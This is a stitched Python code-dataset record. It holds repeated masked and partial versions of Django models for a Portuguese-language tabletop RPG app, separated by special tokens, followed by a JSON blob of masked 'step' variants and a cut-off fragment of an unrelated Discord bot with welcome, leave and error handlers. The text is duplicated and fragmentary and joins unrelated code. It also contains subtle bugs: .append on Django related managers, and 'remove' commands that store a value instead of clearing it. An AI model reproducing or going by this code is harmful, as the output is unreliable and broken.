quantidade_pericias_por_nivel = IntegerField(validators=[
MinValueValidator(1)])
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',
'Não conjurador'))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
max_length=3)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Resistencia(Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
unique_together = 'slug', 'qualidade', 'nivel', 'valor'
def __str__(self):
return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)
class Pericia(Model):
nome = CharField(max_length=37)
slug = CharField(max_length=37, unique=True)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
quantidade_pericias_por_nivel = IntegerField(validators=[
MinValueValidator(1)])
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',
'Não conjurador'))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
max_length=3)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Atributo(Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Resistencia(Model):
nivel = IntegerField(validators=[MaxValueValidator(20),
MinValueValidator(1)])
valor = IntegerField(validators=[MaxValueValidator(20),
MinValueValidator(0)])
NOME = Choices('Fortitude', 'Reflexo', 'Vontade')
nome = CharField(choices=NOME, max_length=9)
SLUG = Choices('fort', 'ref', 'von')
slug = CharField(choices=SLUG, max_length=4)
QUALIDADE = Choices(('boa', 'Resistencia Boa'), ('ruim',
'Resistencia Ruim'))
qualidade = CharField(choices=QUALIDADE, max_length=4)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
class Meta:
unique_together = 'slug', 'qualidade', 'nivel', 'valor'
def __str__(self):
return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)
class Pericia(Model):
nome = CharField(max_length=37)
slug = CharField(max_length=37, unique=True)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
quantidade_pericias_por_nivel = IntegerField(validators=[
MinValueValidator(1)])
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',
'Não conjurador'))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
max_length=3)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
from django.db.models import Model, CharField, IntegerField, ManyToManyField, ForeignKey, PROTECT
from django.core.validators import MaxValueValidator, MinValueValidator
from polymorphic.models import PolymorphicModel
from model_utils import Choices
class Tendencia(Model):
    """An alignment ("tendência") option, identified by a short slug."""

    valor = CharField(max_length=16, unique=True)  # display text; returned by __str__
    slug = CharField(max_length=3, unique=True)  # 3-character short code

    def __str__(self):
        return self.valor
class Bba(Model):
    """Base attack bonus for one character level and progression quality."""

    # Both fields are bounded to the 1-20 level range of the system.
    nivel = IntegerField(validators=[MaxValueValidator(20), MinValueValidator(1)])
    valor = IntegerField(validators=[MaxValueValidator(20), MinValueValidator(0)])
    QUALIDADE = Choices(('boa', 'BBA Boa'), ('ruim', 'BBA Ruim'))
    qualidade = CharField(choices=QUALIDADE, max_length=4)

    class Meta:
        # One row per (quality, level, value) combination.
        unique_together = ('qualidade', 'nivel', 'valor')

    def __str__(self):
        return f'BBA {self.qualidade} nível {self.nivel}'
class Atributo(Model):
    """One of the six base ability scores (Str/Dex/Con/Int/Wis/Cha)."""

    NOME = Choices('Força', 'Destreza', 'Constituição', 'Inteligência',
                   'Sabedoria', 'Carisma')
    nome = CharField(choices=NOME, max_length=12, unique=True)
    # Three-letter abbreviations matching NOME, in the same order.
    SLUG = Choices('for', 'des', 'con', 'int', 'sab', 'car')
    slug = CharField(choices=SLUG, max_length=3, unique=True)

    def __str__(self):
        return self.nome
class Resistencia(Model):
    """Saving-throw entry (Fortitude/Reflex/Will) for a level and quality."""

    # Both fields are bounded to the 1-20 level range of the system.
    nivel = IntegerField(validators=[MaxValueValidator(20), MinValueValidator(1)])
    valor = IntegerField(validators=[MaxValueValidator(20), MinValueValidator(0)])
    NOME = Choices('Fortitude', 'Reflexo', 'Vontade')
    nome = CharField(choices=NOME, max_length=9)
    # Abbreviations matching NOME, in the same order.
    SLUG = Choices('fort', 'ref', 'von')
    slug = CharField(choices=SLUG, max_length=4)
    QUALIDADE = Choices(('boa', 'Resistencia Boa'), ('ruim', 'Resistencia Ruim'))
    qualidade = CharField(choices=QUALIDADE, max_length=4)
    # PROTECT: an Atributo referenced here cannot be deleted.
    atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)

    class Meta:
        # One row per (save, quality, level, value) combination.
        unique_together = ('slug', 'qualidade', 'nivel', 'valor')

    def __str__(self):
        return f'{self.nome} {self.qualidade} nivel {self.nivel}'
class Pericia(Model):
    """A skill ("perícia") tied to the ability score it is rolled with."""

    nome = CharField(max_length=37)
    slug = CharField(max_length=37, unique=True)
    # PROTECT: an Atributo referenced by any Pericia cannot be deleted.
    atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)

    def __str__(self):
        return self.nome
class Classe(PolymorphicModel):
    """A character class: its skills, BBA/save progressions, allowed
    alignments, hit die and caster kind.

    Polymorphic so subclasses (e.g. ClassePrestigio) can be queried
    through the base table.
    """

    nome = CharField(max_length=20)
    slug = CharField(max_length=20, unique=True)
    pericias = ManyToManyField(Pericia, related_name='+')
    quantidade_pericias_por_nivel = IntegerField(
        validators=[MinValueValidator(1)]
    )
    bbas = ManyToManyField(Bba, related_name='+')
    resistencias = ManyToManyField(Resistencia, related_name='+')
    tendencias = ManyToManyField(Tendencia, related_name='+')
    # Allowed hit-die sizes, stored as the number of faces.
    DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
    dv = IntegerField(choices=DV)
    CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'),
                         ('nan', 'Não conjurador'))
    conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
                           max_length=3)

    # conjurador_completo = BooleanField(default=True)

    def add_tendencia(self, tendencia):
        """Link an allowed alignment to this class."""
        # Bug fix: Django related managers expose ``add``, not ``append``
        # (``append`` raised AttributeError at runtime).
        self.tendencias.add(tendencia)

    def add_pericia(self, pericia):
        """Link a class skill to this class."""
        self.pericias.add(pericia)

    def add_bba(self, bba):
        """Link a per-level BBA entry to this class."""
        self.bbas.add(bba)

    def add_resistencia(self, resistencia):
        """Link a per-level saving-throw entry to this class."""
        self.resistencias.add(resistencia)

    def get_bba_nivel(self, nivel):
        """Return the BBA value for *nivel*, or 0 when no entry exists."""
        for bba in self.bbas.all():
            assert isinstance(bba, Bba)
            if bba.nivel == nivel:
                return bba.valor
        return 0

    def __str__(self):
        return self.nome
class ClassePrestigio(Classe):
    """Prestige class: identical fields/behaviour, distinct polymorphic type."""
    pass
class Tipo(Model):
    """A creature type, identified by a unique slug."""

    nome = CharField(max_length=14)
    slug = CharField(max_length=14, unique=True)

    def __str__(self):
        return self.nome
class Raca(Model):
    """A playable race ("raça"), identified by a unique slug."""

    nome = CharField(max_length=14)
    slug = CharField(max_length=14, unique=True)

    def __str__(self):
        return self.nome
class Modelo(Model):
    """A creature template ("modelo"), identified by a unique slug."""

    nome = CharField(max_length=20)
    slug = CharField(max_length=20, unique=True)

    def __str__(self):
        return self.nome
|
flexible
|
{
"blob_id": "c07454dfb9dabb89c86f63063231ae9cf915aa38",
"index": 4116,
"step-1": "<mask token>\n\n\nclass Classe(PolymorphicModel):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n <mask token>\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-2": "<mask token>\n\n\nclass Pericia(Model):\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(validators=[\n MinValueValidator(1)])\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',\n 'Não conjurador'))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,\n max_length=3)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-3": "<mask token>\n\n\nclass Resistencia(Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n unique_together = 'slug', 'qualidade', 'nivel', 'valor'\n\n def __str__(self):\n return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)\n\n\nclass Pericia(Model):\n nome = CharField(max_length=37)\n slug = CharField(max_length=37, unique=True)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(validators=[\n MinValueValidator(1)])\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',\n 'Não conjurador'))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,\n max_length=3)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = 
CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-4": "<mask token>\n\n\nclass Atributo(Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Resistencia(Model):\n nivel = IntegerField(validators=[MaxValueValidator(20),\n MinValueValidator(1)])\n valor = IntegerField(validators=[MaxValueValidator(20),\n MinValueValidator(0)])\n NOME = Choices('Fortitude', 'Reflexo', 'Vontade')\n nome = CharField(choices=NOME, max_length=9)\n SLUG = Choices('fort', 'ref', 'von')\n slug = CharField(choices=SLUG, max_length=4)\n QUALIDADE = Choices(('boa', 'Resistencia Boa'), ('ruim',\n 'Resistencia Ruim'))\n qualidade = CharField(choices=QUALIDADE, max_length=4)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n\n class Meta:\n unique_together = 'slug', 'qualidade', 'nivel', 'valor'\n\n def __str__(self):\n return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)\n\n\nclass Pericia(Model):\n nome = CharField(max_length=37)\n slug = CharField(max_length=37, unique=True)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(validators=[\n MinValueValidator(1)])\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',\n 'Não conjurador'))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,\n max_length=3)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n 
self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-5": "from django.db.models import Model, CharField, IntegerField, ManyToManyField, ForeignKey, PROTECT\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom polymorphic.models import PolymorphicModel\nfrom model_utils import Choices\n\n\nclass Tendencia(Model):\n valor = CharField(max_length=16, unique=True)\n slug = CharField(max_length=3, unique=True)\n\n def __str__(self):\n return self.valor\n\n\nclass Bba(Model):\n nivel = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(1)\n ]\n )\n valor = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(0)\n ]\n )\n QUALIDADE = Choices(('boa', ('BBA Boa')), ('ruim', ('BBA Ruim')))\n qualidade = CharField(choices=QUALIDADE, max_length=4)\n\n class Meta:\n unique_together = ('qualidade', 'nivel', 'valor')\n\n def __str__(self):\n return 'BBA {} nível {}'.format(self.qualidade, self.nivel)\n\n\nclass Atributo(Model):\n NOME = Choices(('Força'), ('Destreza'), ('Constituição'),\n ('Inteligência'), ('Sabedoria'), ('Carisma'))\n nome = CharField(choices=NOME, max_length=12, unique=True)\n SLUG = Choices(('for'), ('des'), ('con'),\n ('int'), ('sab'), ('car'))\n slug = CharField(choices=SLUG, max_length=3, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Resistencia(Model):\n nivel = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(1)\n ]\n )\n valor = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(0)\n ]\n )\n NOME = Choices(('Fortitude'), ('Reflexo'), ('Vontade'))\n nome = CharField(choices=NOME, max_length=9)\n SLUG = Choices(('fort'), ('ref'), ('von'))\n slug = CharField(choices=SLUG, max_length=4)\n QUALIDADE = Choices(('boa', ('Resistencia Boa')), ('ruim', ('Resistencia Ruim')))\n qualidade = CharField(choices=QUALIDADE, max_length=4)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n class Meta:\n unique_together = ('slug', 'qualidade', 'nivel', 
'valor')\n\n def __str__(self):\n return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)\n\n\nclass Pericia(Model):\n nome = CharField(max_length=37)\n slug = CharField(max_length=37, unique=True)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(\n validators=[\n MinValueValidator(1)\n ]\n )\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, ('d4')), (6, ('d6')), (8, ('d8')), (10, ('d10')), (12, ('d12')))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', ('Divino')), ('arc', ('Arcano')), ('nan', ('Não conjurador')))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan, max_length=3)\n\n # conjurador_completo = BooleanField(default=True)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = 
CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-ids": [
15,
20,
23,
25,
35
]
}
|
[
15,
20,
23,
25,
35
] |
<|reserved_special_token_0|>
def insert_returns(body):
    """Rewrite the final statement of *body* so its value is returned.

    Recurses into a trailing ``if``/``with`` so the deepest trailing
    expression becomes an explicit ``return``.
    NOTE(review): an ``if`` with no ``else`` leaves ``orelse`` empty, so
    ``body[-1]`` would raise IndexError — same as the original; confirm
    callers never pass that shape.
    """
    last = body[-1]
    if isinstance(last, ast.Expr):
        body[-1] = ast.Return(last.value)
        ast.fix_missing_locations(body[-1])
    elif isinstance(last, ast.If):
        insert_returns(last.body)
        insert_returns(last.orelse)
    elif isinstance(last, ast.With):
        insert_returns(last.body)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_prefix(client, message):
    """Return the command prefix configured for the message's guild,
    creating a fresh per-guild data record on first sight."""
    guild_key = str(message.guild.id)
    if guild_key not in Data.server_data:
        Data.server_data[guild_key] = Data.create_new_data()
    return Data.server_data[guild_key]['prefix']
<|reserved_special_token_0|>
# Register every feature cog, all sharing the same embed theme colour.
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
<|reserved_special_token_0|>
@bot.event
async def on_ready():
    # Start the background loops: periodic data persistence and
    # presence (status) refresh.
    bot.loop.create_task(Data.auto_update_data())
    bot.loop.create_task(update_presence(bot, PREFIX))
    print('Bot is ready...')
@bot.event
async def on_guild_join(guild):
    # Hard-coded log channel ID — presumably a channel on the dev's own
    # server; send raises AttributeError if the channel is not found (TODO confirm).
    log_channel = bot.get_channel(773580297954394162)
    await log_channel.send(
        f'Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}'
    )
@bot.event
async def on_guild_remove(guild):
    # Same hard-coded dev-side log channel as on_guild_join.
    log_channel = bot.get_channel(773580297954394162)
    await log_channel.send(
        f'Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}')
@bot.event
async def on_member_join(member):
    """Assign the configured join role and post a welcome message."""
    guild: discord.Guild = member.guild
    channels = guild.channels
    # Lazily create this guild's settings record on first event.
    if str(guild.id) not in Data.server_data:
        Data.server_data[str(guild.id)] = Data.create_new_data()
    data = Data.server_data[str(guild.id)]
    print(f'{member} has joined {guild} server...')
    join_role = guild.get_role(data['join_role'])
    if join_role is not None:
        await member.add_roles(join_role)
    if data['welcome_msg'] is None:
        # No custom message configured: fall back to a default.
        server_wlcm_msg = (
            f'Welcome, {member.mention}, to the Official **{guild.name}** Server'
            )
    else:
        # Custom message: '[mention]' is the placeholder for the new member.
        server_wlcm_msg = data['welcome_msg']
        server_wlcm_msg = server_wlcm_msg.replace('[mention]',
            f'{member.mention}')
    wel_channel = None
    if data['welcome_channel'] is None:
        # No channel configured: pick the first channel whose name
        # contains 'welcome'.
        for channel in channels:
            if str(channel).find('welcome') != -1:
                wel_channel = channel
                break
    else:
        wel_channel = guild.get_channel(int(data['welcome_channel']))
    try:
        # wel_channel may still be None; the AttributeError below
        # covers that case.
        await wel_channel.send(server_wlcm_msg)
    except AttributeError:
        print('DEBUG: No welcome channel has been set or found.')
@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
    # NOTE(review): despite the name, this assigns the *channel* argument
    # to 'welcome_channel' rather than clearing it (e.g. setting None) —
    # confirm intended behaviour before changing.
    if str(ctx.guild.id) not in Data.server_data:
        Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
    Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel
    await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
    """Post a goodbye message when a member leaves the guild."""
    guild = member.guild
    channels = guild.channels
    # Lazily create this guild's settings record on first event.
    if str(guild.id) not in Data.server_data:
        Data.server_data[str(guild.id)] = Data.create_new_data()
    data = Data.server_data[str(guild.id)]
    print(f'{member} has left the {guild.name}...')
    if data['leave_msg'] is None:
        # No custom message configured: fall back to a default.
        server_leave_msg = (
            f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'
            )
    else:
        # Custom message: '[member]' is the placeholder for the leaver.
        server_leave_msg = data['leave_msg']
        server_leave_msg = server_leave_msg.replace('[member]', f'{member}')
    lv_channel = None
    if data['leave_channel'] is None:
        # No channel configured: pick the first channel whose name
        # contains 'bye' or 'leave'.
        for channel in channels:
            if str(channel).find('bye') != -1 or str(channel).find('leave'
                ) != -1:
                lv_channel = channel
                break
    else:
        lv_channel = guild.get_channel(int(data['leave_channel']))
    try:
        # lv_channel may still be None; the AttributeError below covers it.
        await lv_channel.send(server_leave_msg)
    except AttributeError:
        print('DEBUG: No leave channel has been set or found.')
@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_leave(ctx, *, channel):
    """Handler for the 'remove_leave' command.

    Bug fix: the function was named ``remove_welcome``, shadowing the
    earlier welcome-channel command's function at module level. The
    registered command name/aliases are unchanged.
    NOTE(review): like its welcome counterpart, this assigns the
    *channel* argument to 'leave_channel' rather than clearing it —
    confirm intended behaviour.
    """
    if str(ctx.guild.id) not in Data.server_data:
        Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
    Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel
    await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
    """Central command-error handler: unwrap, classify, report to the user."""
    try:
        # CommandInvokeError wraps the real exception in .original;
        # errors without .original raise AttributeError, swallowed here.
        error = error.original
    except Exception:
        pass
    # Exact type checks (not isinstance): subclasses fall through to the
    # generic branch below.
    if type(error) is discord.ext.commands.errors.CommandNotFound:
        return
    elif type(error) is discord.ext.commands.errors.BadArgument:
        pass
    elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
        pass
    elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
        pass
    elif type(error) is discord.ext.commands.errors.MissingPermissions:
        pass
    elif type(error) is discord.ext.commands.errors.NotOwner:
        pass
    elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
        pass
    elif type(error) is discord.ext.commands.errors.ChannelNotFound:
        pass
    elif type(error) is discord.ext.commands.errors.BadUnionArgument:
        pass
    elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
        pass
    elif type(error) is discord.errors.Forbidden:
        error = "I don't have permission to do that!"
    else:
        # Unexpected error: log the full traceback to stderr.
        print(f'Error {type(error)}: {error}')
        traceback.print_exception(type(error), error, error.__traceback__,
            file=sys.stderr)
        # NOTE(review): this embed is built but never sent — the plain
        # text message below is used instead; confirm whether
        # ctx.send(embed=embed) was intended.
        embed = discord.Embed(title='Error!', description=
            'An unexpected error ocurred. Please report this to the dev.'
            )
